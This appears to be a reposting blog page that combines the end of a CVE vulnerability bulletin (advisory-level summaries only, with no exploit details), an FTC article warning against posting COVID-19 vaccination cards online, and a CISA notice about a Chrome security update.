  Cross-site request forgery (CSRF) vulnerability in Name Directory 1.17.4 and earlier allows remote attackers to hijack the authentication of administrators via unspecified vectors. 2021-02-05 not yet calculated CVE-2021-20652
MISC
MISC zoho — manageengine_applications_manager
  doFilter in com.adventnet.appmanager.filter.UriCollector in Zoho ManageEngine Applications Manager through 14930 allows an authenticated SQL Injection via the resourceid parameter to showresource.do. 2021-02-05 not yet calculated CVE-2020-35765
MISC
CONFIRM zohocorp — manageengine_remote_access_plus
  Zoho ManageEngine Remote Access Plus 10.0.259 allows HTML injection via the Description field on the Admin – User Administration userMgmt.do?actionToCall=ShowUser screen. 2021-02-03 not yet calculated CVE-2019-16268
MISC
CONFIRM zulipchat — zulip_desktop
  Zulip Desktop before 5.0.0 allows attackers to perform recording via the webcam and microphone due to a missing permission request handler. 2021-02-05 not yet calculated CVE-2020-10858
CONFIRM zulipchat — zulip_desktop
  Zulip Desktop before 5.0.0 improperly uses shell.openExternal and shell.openItem with untrusted content, leading to remote code execution. 2021-02-05 not yet calculated CVE-2020-10857
CONFIRM zzzcms — zzzcms
  SQL Injection in ZZZCMS zzzphp 1.7.1 allows remote attackers to execute arbitrary code due to a lack of parameter filtering in inc/zzz_template.php. 2021-02-05 not yet calculated CVE-2020-18717
MISC
Social media is no place for COVID-19 vaccination cards

Social media is no place for COVID-19 vaccination cards

This article was originally posted by the FTC. See the original article here.

Some of you are celebrating your second COVID-19 vaccination with the giddy enthusiasm that’s usually reserved for weddings, new babies, and other life events. You’re posting a photo of your vaccination card on social media. Please — don’t do that! You could be inviting identity theft. 

Your vaccination card has information on it including your full name, date of birth, where you got your vaccine, and the dates you got it. When you post it to Facebook, Instagram, or to some Sticker with an orange background. It says, "I got my COVID-19 vaccine!"other social media platform, you may be handing valuable information over to someone who could use it for identity theft.

Think of it this way — identity theft works like a puzzle, made up of pieces of personal information. You don’t want to give identity thieves the pieces they need to finish the picture. One of those pieces is your date of birth. For example, just by knowing your date and place of birth, scammers sometimes can guess most of the digits of your Social Security number. Once identity thieves have the pieces they need, they can use the information to open new accounts in your name, claim your tax refund for themselves, and engage in other identity theft.

Want to share the news about your vaccination? How about a photo of a nifty adhesive bandage on the injection site? (You can show off your tattoos and deltoids at the same time.) Or, post a photo of your white or orange vaccine sticker. The stickers are really cool.

As for your social media networks, be sure that you’re not oversharing information that can serve as a key to your PIN number or answer a security question. And, while you’re checking, check your privacy settings too. If you want to limit access to a small group of family and friends, make sure the settings are configured to avoid sharing information with strangers.

Visit How to Keep Your Personal Information Secure for more tips about protecting your information against identity thieves.

 

Brought to you by Dr. Ware, Microsoft Office 365 Silver Partner, Charleston SC.

Google Releases Security Updates for Chrome

This article is contributed. See the original author and article here.

Google has released Chrome Version 88.0.4324.150 for Windows, Mac, and Linux. This version addresses a vulnerability that an attacker could exploit to take control of an affected system.

CISA encourages users and administrators to review the Chrome Release and apply the necessary updates.